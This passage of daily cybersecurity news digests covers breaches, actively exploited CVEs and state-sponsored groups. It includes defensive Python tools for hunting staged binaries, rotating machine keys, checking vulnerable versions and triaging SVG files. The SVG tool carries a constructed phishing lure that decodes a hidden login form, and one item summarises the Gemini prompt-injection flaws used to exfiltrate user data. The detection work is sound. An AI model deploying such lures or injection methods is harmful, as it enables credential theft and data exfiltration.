- Framework is rolling out firmware updates (new BIOS builds and DBX revocations for the affected shells) to close the hole; until they are applied, users should limit who can boot or physically access the machine.
🤖 Bleeping Computer | bleepingcomputer.com/news/secu

Microsoft's October Patch Tuesday: 6 Zero-Days, 172 Flaws 🩹

- Microsoft's October Patch Tuesday addressed 172 vulnerabilities, including six zero-days, the largest monthly batch of fixes this year.
- Two actively exploited zero-days are CVE-2025-24990 (Windows Agere Modem Driver Elevation of Privilege) and CVE-2025-59230 (Windows Remote Access Connection Manager Elevation of Privilege), both added to CISA's KEV catalog.
- Other notable fixes include CVE-2025-0033 (AMD RMPocalypse) and CVE-2025-47827 (IGEL OS Secure Boot bypass), with Windows 10 reaching its end of free support.
🤖 Bleeping Computer | bleepingcomputer.com/news/micr
🤫 CyberScoop | cyberscoop.com/microsoft-patch

Threat Landscape Commentary 🌍

UK Cyberattacks Reach Record High 📈

- The UK's NCSC reported a record 204 "nationally significant" cyberattacks between September 2024 and August 2025, more than double the previous year, with 18 being "highly significant."
- This surge in sophisticated and frequent hostile cyber activity, exemplified by incidents like the Jaguar Land Rover disruption, poses a direct threat to the UK's economic security.
- The government is urging CEOs and board chairs of leading businesses to take concrete actions and make cyber resilience a top-level responsibility.
🗞️ The Record | therecord.media/uk-hit-by-reco

Taiwan Reports Surge in Chinese Cyber & Disinformation Campaigns 🇨🇳

- Taiwan's National Security Bureau (NSB) warns of a significant increase in Chinese cyberattacks and online disinformation, with government networks facing an average of 2.8 million intrusion attempts a day, up 17%.
- These state-level operations, involving the PLA and other agencies, target critical infrastructure and use "online troll armies" and AI-generated content to erode public trust and sow division ahead of 2026 elections.
- The campaign aims to promote pro-China narratives and undermine trust in the US, highlighting the integrated nature of cyber espionage and information warfare.
🗞️ The Record | therecord.media/taiwan-nsb-rep

#CyberSecurity #ThreatIntelligence #Ransomware #ZeroDay #Vulnerability #ActiveExploitation #APT #NationState #DataBreach #Privacy #PatchTuesday #SupplyChainAttack #Malware #CTEM #Infosec

2025-09-30

Morning, cyber pros! ☕ It's been a packed 24 hours with some serious breaches, actively exploited vulnerabilities, and significant regulatory shifts. We're also seeing new threat actor TTPs and a massive crypto bust. Let's dive in:

Airline and Beverage Giant Hit by Cyberattacks ⚠️

- Canadian airline WestJet confirmed a June cyberattack exposed sensitive customer data, including full names, dates of birth, mailing addresses, and travel documents like passports and government IDs. No credit card or password data was compromised.
- Japanese beverage company Asahi experienced a cyberattack causing system failures that halted order, shipment, and call centre operations in Japan, though no personal or customer data leakage has been confirmed.
- These incidents highlight the ongoing vulnerability of major corporations to cyber threats, with WestJet's breach potentially linked to the Scattered Spider group, known for targeting aviation.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🗞️ The Record | therecord.media/asahi-japan-cy

New Chinese Espionage Group "Phantom Taurus" Emerges 🇨🇳

- Palo Alto Networks' Unit 42 has identified a new, highly stealthy Chinese espionage group, "Phantom Taurus," targeting geopolitically significant victims in the Middle East, Africa, and Asia.
- This group uses a distinct set of custom malware, including the NET-STAR suite of web-based backdoors, designed for extreme stealth and long-term persistence to exfiltrate sensitive data.
- Phantom Taurus primarily gains initial access by exploiting known vulnerabilities in internet-facing devices, underscoring the importance of timely patching even against advanced threats.

🤫 CyberScoop | cyberscoop.com/phantom-taurus-

North Korean IT Worker Scheme Expands Globally 🇰🇵

- Okta's research reveals North Korea is significantly expanding its illicit IT worker scheme beyond the US tech sector, now targeting dozens of industries and countries worldwide, including finance, healthcare, and government.
- These workers use fake or stolen identities to secure high-paying remote roles, aiming to circumvent sanctions and generate millions for Pyongyang's military, with a notable increase in applications for AI-focused positions.
- The campaign's evolution into new markets, coupled with increased pressure from law enforcement, suggests North Korean threat actors may increasingly resort to ransomware, data theft, and extortion tactics.

🗞️ The Record | therecord.media/north-korea-it

MatrixPDF Toolkit Weaponises PDFs for Phishing 🎣

- A new toolkit called MatrixPDF is being sold on cybercrime forums, enabling attackers to transform ordinary PDF files into interactive phishing and malware lures that bypass email security.
- The tool allows embedding blurred content, fake "Secure Document" prompts, and clickable overlays that redirect victims to credential theft pages or malware downloads, leveraging JavaScript actions.
- MatrixPDF's design cleverly bypasses Gmail's phishing filters by not containing malicious binaries directly, instead relying on user interaction to open external malicious links, making it a potent new threat.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu

Google Drive Integrates AI for Ransomware Detection 🛡️

- Google has rolled out a new AI tool in Drive for desktop designed to detect ransomware activity, such as mass file encryption, and automatically pause syncing to limit damage spread.
- The model, trained on millions of real-world ransomware samples and leveraging VirusTotal threat intelligence, aims to provide early alerts and facilitate file restoration with a few clicks.
- While a significant defensive layer, Google clarifies this is not a silver bullet to prevent ransomware outright but rather to mitigate its impact, working in conjunction with traditional antivirus solutions.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

Anthropic Enhances Claude Sonnet 4.5 for Safety and Security 🤖

- Anthropic has released Claude Sonnet 4.5, touting significant improvements in safety and security, including enhanced defences against prompt injection attacks and reduced concerning behaviours like sycophancy and deception.
- The model was trained and deployed under Anthropic's AI Safety Level 3 standard, with tighter internal security controls and safeguards that harden it against jailbreaks and make it refuse harmful requests, particularly around weapons and influence operations.
- Sonnet 4.5 also shows "meaningful" improvements in defensive cybersecurity tasks like vulnerability discovery and code analysis, though it still operates "well below" the capabilities for autonomous end-to-end cyber operations.

🤫 CyberScoop | cyberscoop.com/anthrophic-sonn

Cisco ASA/FTD Flaws Actively Exploited, Thousands Remain Vulnerable 🚨

- Nearly 50,000 Cisco Adaptive Security Appliance (ASA) and Firewall Threat Defense (FTD) instances remain internet-exposed and vulnerable to CVE-2025-20333 (RCE) and CVE-2025-20362 (VPN access bypass), which are actively exploited.
- Despite Cisco's warnings and a rare 24-hour CISA emergency directive for federal agencies to patch, a significant number of devices, particularly in the US, are yet to be secured.
- Attackers, potentially linked to the sophisticated ArcaneDoor campaign, are deploying 'RayInitiator' bootkit and 'Line Viper' shellcode loader, highlighting an advanced evolution in tradecraft targeting end-of-life or soon-to-be end-of-life devices.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🕵🏼 The Register | go.theregister.com/feed/www.th

Critical Sudo Flaw Under Active Exploitation 🐧

- CISA has added CVE-2025-32463, a critical privilege escalation vulnerability in the Linux Sudo package, to its Known Exploited Vulnerabilities catalog due to active exploitation.
- This flaw allows local attackers to execute arbitrary commands as root using the -R (--chroot) option, even if they are not listed in the sudoers file, affecting Sudo versions 1.9.14 through 1.9.17.
- Federal agencies have until October 20 to apply mitigations or discontinue Sudo use, underscoring the urgency for all organisations to patch immediately.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
📰 The Hacker News | thehackernews.com/2025/09/cisa

Fortra GoAnywhere MFT Vulnerability Actively Exploited 📁

- CISA has ordered federal agencies to patch CVE-2025-10035, a critical deserialization vulnerability (CVSS 10.0) in Fortra's GoAnywhere MFT solution, due to strong indications of active exploitation.
- The flaw primarily affects organisations with an internet-exposed GoAnywhere admin console and could lead to command injection, reminiscent of a 2023 GoAnywhere vulnerability exploited by ransomware gangs like Clop.
- Fortra has released a patch and mitigation guidance, urging customers to review configurations and remove public access from the Admin Console, despite not explicitly confirming in-the-wild exploitation.

🗞️ The Record | therecord.media/cisa-orders-fe
📰 The Hacker News | thehackernews.com/2025/09/fort

Broadcom Patches Actively Exploited VMware Zero-Day and NSA-Reported Flaws ☁️

- Broadcom has patched CVE-2025-41244, a high-severity privilege escalation vulnerability in VMware Aria Operations and VMware Tools, which has been exploited as a zero-day by the Chinese state-sponsored threat actor UNC5174 since October 2024.
- UNC5174 leverages this flaw by staging a malicious binary in common paths like /tmp/httpd, which is then picked up by VMware service discovery, leading to root-level code execution.
- Additionally, Broadcom fixed two high-severity VMware NSX username enumeration vulnerabilities (CVE-2025-41251, CVE-2025-41252) reported by the NSA, which could facilitate brute-force attacks.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
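The staging pattern described above is easy to hunt for on a host. The block below is an added example written for this digest, not Broadcom's, the researchers' or any reporter's code: it parses `ps -eo pid,user,args` output for service-named binaries running from world-writable directories, and walks those directories for dropped executables with the same names. The directory list, the set of daemon names (only httpd comes from the report) and the sample ps listing are assumptions or constructed fixtures.

```python
import os
import stat
from pathlib import PurePosixPath

# Directories an unprivileged user can write to (assumption: the usual suspects).
STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
# Binary names a service-discovery probe would be expected to look for.
# httpd comes from the report above; the rest are assumptions, extend to taste.
DISCOVERY_NAMES = {"httpd", "nginx", "mysqld", "postgres", "java", "sshd", "dataserver"}


def in_staging_dir(path: str) -> bool:
    """True if an absolute path lives under one of the staging directories."""
    return any(path == d or path.startswith(d + "/") for d in STAGING_DIRS)


def flag_ps_lines(ps_output: str) -> list:
    """Parse `ps -eo pid,user,args` output and return entries where a
    discovery-probed binary name is running from a staging directory."""
    hits = []
    for line in ps_output.strip().splitlines()[1:]:      # first line is the header
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, args = parts
        exe = args.split()[0]
        if exe.startswith("/") and in_staging_dir(exe) \
                and PurePosixPath(exe).name in DISCOVERY_NAMES:
            hits.append({"pid": int(pid), "user": user, "exe": exe})
    return hits


def flag_staged_files(root_dirs=STAGING_DIRS) -> list:
    """Walk the staging directories on this host and list executable files
    whose name would be picked up by discovery, whether or not they are running."""
    found = []
    for d in root_dirs:
        for dirpath, _, files in os.walk(d):
            for name in files:
                if name not in DISCOVERY_NAMES:
                    continue
                full = os.path.join(dirpath, name)
                try:
                    mode = os.stat(full).st_mode
                except OSError:
                    continue
                if mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
                    found.append(full)
    return sorted(found)


# Constructed sample: what `ps -eo pid,user,args` might show on a host where an
# unprivileged user has staged a fake httpd in /tmp (not a real capture).
CONSTRUCTED_PS = """PID USER ARGS
1 root /sbin/init
812 root /usr/sbin/httpd -DFOREGROUND
2307 www-data /tmp/httpd -DFOREGROUND
2311 root /usr/bin/vmtoolsd
"""

if __name__ == "__main__":
    for hit in flag_ps_lines(CONSTRUCTED_PS):
        print("suspicious process:", hit)
    for path in flag_staged_files():
        print("staged binary:", path)
```

Run flag_staged_files() as root on a VMware Tools host. A hit is not proof of compromise (developers do run test builds out of /tmp), but a service-named binary owned by a non-root user in a world-writable directory on a production VM deserves a look at what the service discovery component has executed.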

Google Gemini AI Flaws Disclosed 🧠

- Researchers have uncovered and Google has patched three "Gemini Trifecta" vulnerabilities in Google's Gemini AI assistant, which could have led to significant privacy risks and data theft.
- Flaws included prompt injection in Gemini Cloud Assist (exploiting log summarisation to compromise cloud resources), search-injection in Gemini Search Personalization (manipulating Chrome search history to leak user data), and indirect prompt injection in Gemini Browsing Tool (exfiltrating user data to external servers).
- These vulnerabilities highlight that AI itself can be an attack vector, not just a target, underscoring the need for robust security in AI adoption.

📰 The Hacker News | thehackernews.com/2025/09/rese

FTC Sues Sendit App for Child Data Collection and Deceptive Practices 🧒

- The FTC is suing Sendit, a popular social media companion app, and its CEO for allegedly violating COPPA by illegally collecting personal data (phone numbers, birthdates, photos, social media usernames) from over 116,000 US children under 13 without parental consent.
- The lawsuit also alleges deceptive practices, including generating fake, provocative anonymous messages to trick users into purchasing a "Diamond Membership" for up to $9.99 a week, falsely promising to reveal sender identities.
- These actions highlight serious concerns about child online privacy and manipulative subscription models, with the FTC seeking to hold the company accountable under COPPA, the FTC Act, and ROSCA.

🤖 Bleeping Computer | bleepingcomputer.com/news/lega
🗞️ The Record | therecord.media/ftc-alleges-se

Imgur Blocks UK Users Following Data Watchdog Fine Warning 🇬🇧

- Imgur has blocked access for all users in the United Kingdom after the Information Commissioner's Office (ICO) issued a notice of intent to fine its parent company, MediaLab, over its handling of children's personal data.
- The geoblock means UK users cannot log in, view content, or upload images, and embedded Imgur content on third-party sites is also unavailable, causing widespread impact.
- The ICO warns that blocking UK users does not exempt Imgur from any previously imposed fines, highlighting the serious consequences of non-compliance with data protection regulations.

🤖 Bleeping Computer | bleepingcomputer.com/news/tech

#CyberSecurity #ThreatIntelligence #Vulnerabilities #ZeroDay #ActiveExploitation #Ransomware #APT #NationState #DataPrivacy #Regulatory #CISA #AI #Phishing #Malware #CryptoCrime #InfoSec #IncidentResponse

2025-09-24

It's been a busy 24 hours in the cyber world with significant updates on nation-state activity, actively exploited vulnerabilities, major law enforcement action, and a stark reminder about the basics of cyber hygiene. Let's dive in:

Recent Attacks & Breaches ⚠️

- A 19-year-old UK national, Thalha Jubair, a core member of the Scattered Spider group, has been arrested, linked to over 120 cyberattacks and $89.5 million in crypto theft.
- The UK's National Crime Agency arrested a suspect in connection with the ransomware attack on RTX subsidiary Collins Aerospace, whose MUSE passenger-processing software outage caused widespread disruption at European airports.
- Boyd Gaming, a major US casino operator, disclosed a data breach following a cyberattack that compromised employee and other individual data, though operations were not materially impacted.
- KNP Logistics Group, a 158-year-old UK business, collapsed after an Akira ransomware attack gained initial access via a weak password, destroying backups and leading to 700 job losses.
- Phishing campaigns are targeting GitHub users with fake Y Combinator invitations to drain crypto wallets and Python developers with fraudulent PyPI sites to steal credentials, posing a significant supply chain risk.

🤫 CyberScoop | cyberscoop.com/thalha-jubair-u
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
📰 The Hacker News | thehackernews.com/2025/09/how-
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🕵🏼 The Register | go.theregister.com/feed/www.th

Chinese APTs: BRICKSTORM & RedNovember Espionage 🇨🇳

- Mandiant and Google Threat Intelligence are tracking a "next-level" Chinese cyberespionage campaign using the sophisticated BRICKSTORM backdoor, with average dwell times of 400 days in victim networks.
- UNC5221, a China-linked group, is deploying BRICKSTORM on appliances lacking EDR (like VMware vCenter/ESXi hosts) to steal intellectual property, develop zero-days, and establish pivot points to downstream victims.
- Another Chinese state-sponsored group, RedNovember (TAG-100/Storm-2077), is targeting global governments and private sectors (defense, aerospace, law firms) using the Go-based Pantegana backdoor and Cobalt Strike, often exploiting perimeter appliance vulnerabilities.

🤫 CyberScoop | cyberscoop.com/chinese-cyberes
🕵🏼 The Register | go.theregister.com/feed/www.th
🗞️ The Record | therecord.media/china-linked-h
📰 The Hacker News | thehackernews.com/2025/09/chin

Zero-Days & Critical Flaws Under Attack 🚨

- Cisco has released patches for a high-severity zero-day (CVE-2025-20352) in the SNMP subsystem of IOS and IOS XE, actively exploited for denial of service and, where the attacker also holds administrative credentials, root-level remote code execution; patch immediately or restrict SNMP access to trusted management hosts.
- State-sponsored actors are exploiting CVE-2025-59689, a command injection flaw in Libraesva Email Security Gateway (ESG), allowing arbitrary command execution via crafted compressed email attachments.
- Hackers are exploiting CVE-2025-51591, an SSRF flaw in the Pandoc utility, to target AWS IMDS and steal EC2 IAM credentials, though IMDSv2 enforcement can mitigate this.
- An unpatched flaw (CVE-2025-10184) in OnePlus OxygenOS allows any installed app to access SMS data and metadata without requiring permission, due to improper write permissions in the Telephony package.
- Two new Supermicro BMC firmware vulnerabilities, a bypass of the earlier fix for CVE-2024-10237 and CVE-2025-6198, let an attacker push malicious firmware images past the BMC's Root of Trust verification, creating a persistent backdoor below the operating system.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
📰 The Hacker News | thehackernews.com/2025/09/stat
📰 The Hacker News | thehackernews.com/2025/09/hack
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🤖 Bleeping Computer | bleepingcomputer.com/news/secu

Global Cybercrime Crackdown 💰

- Interpol's Operation HAECHI VI, involving 40 countries, seized over $439 million in cash and cryptocurrency from cyber-enabled financial crimes between April and August 2025.
- The operation led to 45 arrests, the blocking of 68,000 bank accounts, and the seizure of 400 cryptocurrency wallets, targeting various scams from phishing to money laundering.
- This marks a continuation of successful HAECHI operations, demonstrating the increasing effectiveness of international cooperation against cybercriminal rings.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu

Kali Linux 2025.3 Released 🐧

- Kali Linux 2025.3 has been released, introducing ten new tools for web security auditing, AI agent integration, Kerberos relaying, and network pivoting.
- The update brings enhanced Wi-Fi features with Nexmon support for Broadcom and Cypress chips, now more accessible to Raspberry Pi and other devices.
- Kali NetHunter also received improvements, including support for Samsung S10 and new features for CARsenal, its car hacking toolkit.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu

#CyberSecurity #ThreatIntelligence #Ransomware #APT #Espionage #ZeroDay #Vulnerability #ActiveExploitation #Phishing #SupplyChain #LawEnforcement #Cybercrime #InfoSec #IncidentResponse #KaliLinux

2025-09-05

Alright team, it's been a pretty packed 24 hours in the cyber world! We've got some critical vulnerabilities under active exploitation, a few notable breaches, and some fascinating new research into AI's role in both defence and attack. Let's dive in:

Wealthsimple and Qantas Hit in Supply Chain Attacks 💸

- Canadian financial firm Wealthsimple disclosed a data breach impacting less than 1% of its clients, with personal and financial data stolen. This incident is linked to the ongoing Salesforce/Salesloft supply-chain attacks by the ShinyHunters group.
- Australian airline Qantas also faced a breach in July, exposing data for 5.7 million people, and has now reduced executive bonuses by 15% in response. This breach is also attributed to the ShinyHunters group, leveraging Salesforce-connected platforms.
- These incidents highlight the severe downstream impact of supply chain compromises, particularly those involving widely used platforms like Salesforce and its integrations, underscoring the need for robust third-party risk management.

🗞️ The Record | therecord.media/qantas-airline
🤖 Bleeping Computer | bleepingcomputer.com/news/secu

GhostRedirector Hijacks Windows Servers for SEO Fraud 👻

- A new, possibly China-based group dubbed GhostRedirector has compromised at least 65 Windows servers globally, deploying Rungan and Gamshen backdoors.
- Gamshen, embedded in Microsoft IIS, manipulates Google search rankings to promote gambling websites, acting as an "SEO fraud-as-a-service" scheme.
- While not directly delivering malicious content to visitors, this activity damages the reputation of compromised sites and highlights the use of public exploits and privilege escalation to maintain persistence.

🗞️ The Record | therecord.media/seo-scheme-win

Sitecore Zero-Day Exploited via Public Sample Keys ⚠️

- A ViewState deserialization vulnerability, CVE-2025-53690, in multiple Sitecore products (XM, XP, XC, Managed Cloud) is under active exploitation, leading to remote code execution (RCE).
- The flaw stems from customers using publicly documented sample machine keys from older deployment guides instead of generating unique ones, allowing attackers to deploy WEEPSTEEL malware for reconnaissance and achieve privilege escalation.
- CISA has added CVE-2025-53690 to its Known Exploited Vulnerabilities catalog, mandating federal agencies patch by September 25th, urging all affected organisations to rotate keys and monitor for suspicious activity immediately.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ—žοΈ The Record | therecord.media/cisa-orders-pa
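The root cause is a key that is public; the fix is a key that is unique. The block below is an added example written for this digest, not Sitecore's tooling or anything from the reports: it generates a fresh ASP.NET machineKey, audits a web.config for keys that match a caller-supplied list of known sample values, and rotates them in place. The key sizes follow ASP.NET's guidance for HMACSHA256 and AES as an assumption, and the "sample key" in the fixture is made up, not the real value from any Sitecore deployment guide.

```python
import re
import secrets
import xml.etree.ElementTree as ET

# Sizes for the algorithms chosen below (assumption based on ASP.NET guidance:
# 64-byte key for HMACSHA256 validation, 32-byte key for AES decryption).
VALIDATION_KEY_BYTES = 64
DECRYPTION_KEY_BYTES = 32
HEX = re.compile(r"^[0-9A-Fa-f]+$")


def generate_machine_key() -> dict:
    """Fresh, cryptographically random machineKey attributes for one deployment."""
    return {
        "validationKey": secrets.token_hex(VALIDATION_KEY_BYTES).upper(),
        "decryptionKey": secrets.token_hex(DECRYPTION_KEY_BYTES).upper(),
        "validation": "HMACSHA256",
        "decryption": "AES",
    }


def audit_machine_key(web_config_xml: str, known_sample_keys) -> list:
    """Return findings for the <machineKey> in a web.config document.

    known_sample_keys: key values copied out of public documentation that you
    want flagged; they are supplied by the caller, none are hard-coded here."""
    findings = []
    mk = ET.fromstring(web_config_xml).find(".//machineKey")
    if mk is None:
        return []   # no explicit key: ASP.NET auto-generates one per server
    for attr, min_bytes in (("validationKey", VALIDATION_KEY_BYTES),
                            ("decryptionKey", DECRYPTION_KEY_BYTES)):
        value = mk.get(attr, "")
        if value.startswith("AutoGenerate"):
            continue
        if value in known_sample_keys:
            findings.append(f"{attr} matches a publicly documented sample key")
        elif not HEX.match(value) or len(value) < 2 * min_bytes:
            findings.append(f"{attr} is shorter than {min_bytes} bytes or not hex")
    if mk.get("validation", "").upper() in ("MD5", "SHA1"):
        findings.append("validation uses a weak algorithm; use HMACSHA256")
    return findings


def rotate_machine_key(web_config_xml: str) -> str:
    """Replace (or add) the <machineKey> with freshly generated unique keys."""
    root = ET.fromstring(web_config_xml)
    mk = root.find(".//machineKey")
    if mk is None:
        # tag contains a dot, so match it by hand rather than via an ElementPath
        system_web = next((c for c in root if c.tag == "system.web"), None)
        if system_web is None:
            system_web = ET.SubElement(root, "system.web")
        mk = ET.SubElement(system_web, "machineKey")
    for name, value in generate_machine_key().items():
        mk.set(name, value)
    return ET.tostring(root, encoding="unicode")


# Constructed fixture: a config that pasted a made-up "sample" key. This is not
# the real key from any Sitecore deployment guide, just a stand-in for the test.
CONSTRUCTED_SAMPLE_KEY = "A1" * VALIDATION_KEY_BYTES
CONSTRUCTED_WEB_CONFIG = f"""<configuration>
  <system.web>
    <machineKey validationKey="{CONSTRUCTED_SAMPLE_KEY}"
                decryptionKey="{'B2' * DECRYPTION_KEY_BYTES}"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

if __name__ == "__main__":
    print("before:", audit_machine_key(CONSTRUCTED_WEB_CONFIG, {CONSTRUCTED_SAMPLE_KEY}))
    rotated = rotate_machine_key(CONSTRUCTED_WEB_CONFIG)
    print("after:", audit_machine_key(rotated, {CONSTRUCTED_SAMPLE_KEY}))
```

Generate one key set per site and deploy it identically to every node of that site; rotating keys invalidates in-flight ViewState and forms-authentication tickets, so do it in a restart window, and feed the real sample values from the old guides into known_sample_keys when you audit.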

Critical SAP S/4HANA Flaw Actively Exploited 🚨

- A critical command injection vulnerability, CVE-2025-42957 (CVSS 9.9), in SAP S/4HANA is being actively exploited in the wild, impacting both on-premise and Private Cloud editions.
- The flaw allows low-privileged users to inject arbitrary ABAP code, bypass authorization checks, and achieve full system compromise, including creating superuser accounts and manipulating critical business data.
- Organisations must apply SAP's August 2025 security updates immediately, implement SAP UCON to restrict RFC usage, and monitor for suspicious RFC calls or new admin users.

📰 The Hacker News | thehackernews.com/2025/09/sap-
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🕵🏼 The Register | go.theregister.com/feed/www.th

Max Severity Argo CD API Flaw Leaks Credentials 🔒

- A maximum severity (CVSS 10.0) vulnerability, CVE-2025-55190, in Argo CD allows API tokens with even low project-level 'get' permissions to retrieve all repository credentials (usernames, passwords) associated with a project.
- This flaw bypasses isolation mechanisms, enabling attackers to clone private codebases, inject malicious manifests, or pivot to other resources where credentials are reused.
- Every release line before the patched builds is affected; administrators should upgrade to 3.1.2, 3.0.14, 2.14.16 or 2.13.9 immediately and rotate any repository credential that was reachable through an affected instance.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
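Both this Argo CD advisory and the Sudo CVE-2025-32463 entry in the 2025-09-30 post above boil down to the same fleet question: is the build in front of me inside the affected range? The block below is an added example, not Argo CD's, sudo's or CISA's tooling, that answers it from a version banner. The ranges come from the two items as reported here; that sudo's fix shipped as patch level 1.9.17p1, and that Argo CD lines newer than 3.1 were cut after the fix, are assumptions flagged in the comments.

```python
import re


def parse_version(text: str) -> tuple:
    """Pull the first x.y.z[pN] out of a version banner.
    'Sudo version 1.9.17p1' -> (1, 9, 17, 1); 'argocd: v3.1.1+abc' -> (3, 1, 1, 0)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError(f"no x.y.z version found in {text!r}")
    return tuple(int(g or 0) for g in m.groups())


# CVE-2025-32463: 1.9.14 through 1.9.17 affected (from the report above).
# Assumption: the fix shipped as patch level 1.9.17p1, so that is the first safe build.
SUDO_FIRST_AFFECTED = (1, 9, 14, 0)
SUDO_FIRST_FIXED = (1, 9, 17, 1)


def sudo_is_affected(version_banner: str) -> bool:
    """True if the banner from `sudo --version` falls in the affected range."""
    return SUDO_FIRST_AFFECTED <= parse_version(version_banner) < SUDO_FIRST_FIXED


# CVE-2025-55190: first fixed build on each release line, from the report above.
ARGOCD_FIXED = {
    (3, 1): (3, 1, 2, 0),
    (3, 0): (3, 0, 14, 0),
    (2, 14): (2, 14, 16, 0),
    (2, 13): (2, 13, 9, 0),
}


def argocd_status(version_banner: str) -> str:
    """'patched', 'vulnerable', or 'unsupported' (older line with no fixed build)."""
    v = parse_version(version_banner)
    line = v[:2]
    if line in ARGOCD_FIXED:
        return "patched" if v >= ARGOCD_FIXED[line] else "vulnerable"
    if line < min(ARGOCD_FIXED):
        return "unsupported"       # no fixed build on this line: treat as vulnerable, upgrade
    return "patched"               # assumption: lines newer than 3.1 were cut after the fix


if __name__ == "__main__":
    # Constructed banners, not output captured from real hosts.
    for banner in ("Sudo version 1.9.15p5", "Sudo version 1.9.17p1", "Sudo version 1.9.13p3"):
        print(banner, "->", "AFFECTED" if sudo_is_affected(banner) else "ok")
    for banner in ("argocd: v3.1.1+9a4e1f0", "argocd: v2.13.9", "argocd: v2.12.4"):
        print(banner, "->", argocd_status(banner))
```

Feed it the first line of `sudo --version` or of `argocd version --client` (or the server version from the API) and triage the "vulnerable" and "unsupported" results first; "unsupported" means no patched build exists on that line, so the only fix is a line upgrade.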

Undetected SVG Phishing Pages Deliver Malware 🎣

- VirusTotal has identified 44 unique, previously undetected SVG files used in phishing campaigns impersonating the Colombian judicial system.
- These SVG files execute embedded JavaScript to decode and inject Base64-encoded HTML phishing pages, which then stealthily download ZIP archives containing malware like the Atomic macOS Stealer (AMOS) or StealC.
- Attackers are increasingly using "ClickFix" social engineering tactics and terminal-based installations to bypass macOS Gatekeeper protections, highlighting the need for defence-in-depth beyond OS-level controls.

📰 The Hacker News | thehackernews.com/2025/09/viru
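An SVG is XML, so the lure pattern described above (a script inside an image, a base64 literal, a runtime decode, a write into the DOM) can be triaged without rendering anything. The block below is an added example, not VirusTotal's detection logic: it parses an SVG with the standard library, collects script bodies and on* event handlers, decodes long base64 literals, and reports why the file looks like a lure. The heuristics and both sample files are constructed for the example.

```python
import base64
import re
import xml.etree.ElementTree as ET

SVG_NS = "{http://www.w3.org/2000/svg}"
# Heuristics for the behaviours described in the report: a script inside an
# image, a base64 literal, a runtime decode, and a write into the DOM.
# These are assumptions about what the lure looks like, not VirusTotal's rules.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{40,}={0,2})["']""")
DECODE_CALL = re.compile(r"\b(atob|decodeURIComponent|unescape)\s*\(")
DOM_WRITE = re.compile(r"\b(document\.write|innerHTML|outerHTML|insertAdjacentHTML)\b")
HTML_MARKER = re.compile(r"<\s*(html|body|form|input|iframe|script)\b", re.I)


def script_bodies(svg_text: str) -> list:
    """Collect <script> contents and on* event-handler attributes from an SVG."""
    bodies = []
    for el in ET.fromstring(svg_text).iter():
        if el.tag in (SVG_NS + "script", "script"):
            bodies.append(el.text or "")
        for attr, value in el.attrib.items():
            if attr.startswith("on"):
                bodies.append(value)
    return bodies


def decoded_payloads(script: str) -> list:
    """Decode every long base64 string literal in a script body (best effort)."""
    out = []
    for blob in B64_LITERAL.findall(script):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
    return out


def triage_svg(svg_text: str) -> dict:
    """Verdict for one SVG: {'suspicious': bool, 'reasons': [...]}."""
    reasons = set()
    scripts = script_bodies(svg_text)
    if scripts:
        reasons.add("script or event handler inside an image file")
    for body in scripts:
        if DECODE_CALL.search(body):
            reasons.add("runtime decoding call (atob/decodeURIComponent/unescape)")
        if DOM_WRITE.search(body):
            reasons.add("writes content into the DOM")
        if any(HTML_MARKER.search(p) for p in decoded_payloads(body)):
            reasons.add("embedded base64 decodes to HTML markup")
    return {"suspicious": bool(reasons), "reasons": sorted(reasons)}


# Constructed samples (not the files VirusTotal observed): a harmless icon and a
# lure whose script decodes a base64 login form and writes it over the page.
CONSTRUCTED_PHISH_HTML = ('<html><body><form action="https://login.example.invalid/">'
                          '<input name="password"></form></body></html>')
CONSTRUCTED_B64 = base64.b64encode(CONSTRUCTED_PHISH_HTML.encode()).decode()
CONSTRUCTED_LURE_SVG = f"""<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
  <script type="text/javascript"><![CDATA[
    var page = atob("{CONSTRUCTED_B64}");
    document.open(); document.write(page); document.close();
  ]]></script>
</svg>"""
CONSTRUCTED_ICON_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#036"/>
</svg>"""

if __name__ == "__main__":
    for name, svg in (("icon", CONSTRUCTED_ICON_SVG), ("lure", CONSTRUCTED_LURE_SVG)):
        print(name, triage_svg(svg))
```

It is a triage aid, not a verdict: legitimate interactive SVGs also carry scripts, so weight the "decodes to HTML markup" reason highest, and consider stripping or quarantining SVG attachments at the mail gateway if your users have no business receiving them.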

CastleRAT Malware Spreads via ClickFix Social Engineering 🏰

- The TAG-150 criminal group has developed CastleRAT malware in both Python and C variants, spreading through "ClickFix" social engineering tactics that trick users into pasting malicious commands.
- The Python variant is designed for stealth with low antivirus detection, while the C variant is more capable, harvesting keystrokes, taking screen captures, and establishing persistence.
- Operating as a malware-as-a-service, TAG-150's effective social engineering (28.7% success rate) and sophisticated infrastructure (Tox Chat C2, Google Cloud hosting) underscore the growing threat of user-initiated malware installations.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

The First AI-Powered Ransomware: PromptLock PoC 🤖

